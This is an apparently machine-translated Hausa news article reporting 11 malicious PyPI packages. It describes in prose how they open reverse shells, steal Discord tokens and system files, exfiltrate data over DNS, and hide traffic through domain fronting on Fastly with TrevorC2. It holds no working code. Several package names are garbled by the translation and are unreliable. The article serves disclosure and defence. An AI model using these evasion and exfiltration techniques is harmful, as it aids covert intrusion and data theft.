An gano fakiti 11 na mugunta a cikin PyPI

Darkcrizt

4 minti

Kwanaki kadan da suka gabata sanarwar cewa An gano fakiti 11 masu ɗauke da muggan code a cikin kundin adireshin PyPI (Fihirisar fakitin Python).

Kafin a gano matsalolin, An zazzage fakitin kusan sau dubu 38 gabaɗaya Ya kamata a lura cewa fakitin ƙeta da aka gano sun shahara don amfani da nagartattun hanyoyi don ɓoye hanyoyin sadarwa tare da sabar maharan.

Fakitin da aka gano sune kamar haka:

  • fakiti mai mahimmanci (6305 zazzagewa) e muhimmin fakitin (12897): waɗannan fakitin kafa haɗi zuwa uwar garken waje karkashin sunan haɗi zuwa pypi.python.org don samar da damar harsashi zuwa tsarin (reverse harsashi) kuma yi amfani da shirin trevorc2 don ɓoye tashar sadarwa.
  • pptest (10001) da ipboards (946): amfani da DNS azaman tashar sadarwa don canja wurin bayanai game da tsarin (a cikin fakiti na farko, sunan mai masauki, kundin aiki, IP na ciki da waje, a cikin na biyu, sunan mai amfani da sunan mai masauki).
  • owlmoon (3285), Rashin Tsaro (557) y jam'iyyar (1859) - Gano alamar sabis na Discord akan tsarin kuma aika shi zuwa mai watsa shiri na waje.
  • tarfab (287): Aika mai ganowa, sunan mai masauki, da abun ciki na / sauransu / passwd, / da sauransu / runduna, / gida zuwa mai masaukin baki.
  • 10 cent10 (490) - Ƙaddamar da haɗin harsashi mai juyawa zuwa mai watsa shiri na waje.
    yandex-yt (4183): ya nuna saƙo game da tsarin da aka daidaita kuma an tura shi zuwa shafi tare da ƙarin bayani game da ƙarin ayyuka, wanda aka bayar ta hanyar nda.ya.ru (api.ya.cc).

Idan aka ba da wannan, an ambaci cewa ya kamata a ba da kulawa ta musamman ga hanyar samun dama ga rundunonin waje waɗanda ake amfani da su a cikin fakiti fakiti mai mahimmanci da fakiti mai mahimmanci, waɗanda ke amfani da hanyar sadarwar isar da abun ciki da sauri da aka yi amfani da su a cikin kundin PyPI don ɓoye ayyukansu.

A zahiri, an aika buƙatun zuwa uwar garken pypi.python.org (ciki har da tantance sunan python.org a cikin SNI a cikin buƙatun HTTPS), amma an saita sunan uwar garken da maharin ke sarrafawa a cikin taken HTTP "Mai watsa shiri ». Cibiyar isar da abun ciki ta aika da irin wannan buƙatun zuwa uwar garken maharin, ta amfani da sigogin haɗin TLS zuwa pypi.python.org lokacin aika bayanai.

The kayayyakin more rayuwa na PyPI yana aiki ta hanyar hanyar sadarwa ta Isar da abun ciki da sauri, wanda ke amfani da madaidaicin wakili na Varnish. don cache buƙatun na yau da kullun, kuma yana amfani da sarrafa takaddun shaida na matakin CDN na TLS, maimakon sabobin ƙarshen, don tura buƙatun HTTPS ta hanyar wakili. Ba tare da la'akari da masaukin wurin da aka nufa ba, ana aika buƙatun zuwa wakili, wanda ke gano mai masaukin da ake so ta hanyar HTTP "Mai watsa shiri" mai taken, kuma sunaye mai masaukin baki suna da alaƙa da adiresoshin IP na CDN masu daidaita ma'auni na kowane abokin ciniki Fastly.

Uwar garken maharan kuma tana yin rijista tare da CDN Fastly, wanda ke ba kowa da tsare-tsaren ƙimar kyauta kuma har ma yana ba da izinin rajistar da ba a san shi ba. Musamman Hakanan ana amfani da makirci don aika buƙatun ga wanda aka azabtar yayin ƙirƙirar "harsashi mai juyawa", amma wanda maharin ya fara. Daga waje, hulɗar da uwar garken maharin yayi kama da halaltaccen zama tare da kundin adireshi na PyPI, rufaffiyar tare da takardar shaidar PyPI TLS. Irin wannan dabarar, wacce aka sani da "yankin gaba", an riga an yi amfani da ita sosai don ɓoye sunan mai masaukin ta hanyar ƙetare makullai, ta amfani da zaɓin HTTPS da aka bayar akan wasu cibiyoyin sadarwa na CDN, suna ƙayyadad da mai masaukin baki a cikin SNI da wucewa da sunan mai watsa shiri. a cikin babban mai masaukin HTTP a cikin zaman TLS.

Don ɓoye ayyukan mugunta, an kuma yi amfani da kunshin TrevorC2, wanda ke sa hulɗar da uwar garken yayi kama da binciken gidan yanar gizo na yau da kullun.

Fakitin pptest da ipboards sun yi amfani da wata hanya ta daban don ɓoye ayyukan cibiyar sadarwa, dangane da ɓoye bayanai masu amfani a cikin buƙatun zuwa uwar garken DNS. Software na ƙeta yana watsa bayanai ta hanyar yin tambayoyin DNS, wanda a ciki aka sanya bayanan da aka aika zuwa umarni da uwar garken sarrafawa ta amfani da tsarin base64 a cikin sunan yanki. Mai hari yana karɓar waɗannan saƙonni ta hanyar sarrafa sabar DNS na yankin.

A ƙarshe, idan kuna da sha'awar sanin ƙarin abubuwa game da shi, kuna iya tuntuɓar cikakkun bayanai A cikin mahaɗin mai zuwa.


Bar tsokaci

Your email address ba za a buga. Bukata filayen suna alama da *

*

*

  1. Wanda ke da alhakin bayanan: Miguel Ángel Gatón
  2. Manufar bayanan: Sarrafa SPAM, sarrafa sharhi.
  3. Halacci: Yarda da yarda
  4. Sadarwar bayanan: Ba za a sanar da wasu bayanan ga wasu kamfanoni ba sai ta hanyar wajibcin doka.
  5. Ajiye bayanai: Bayanin yanar gizo wanda Occentus Networks (EU) suka dauki nauyi
  6. Hakkoki: A kowane lokaci zaka iyakance, dawo da share bayanan ka.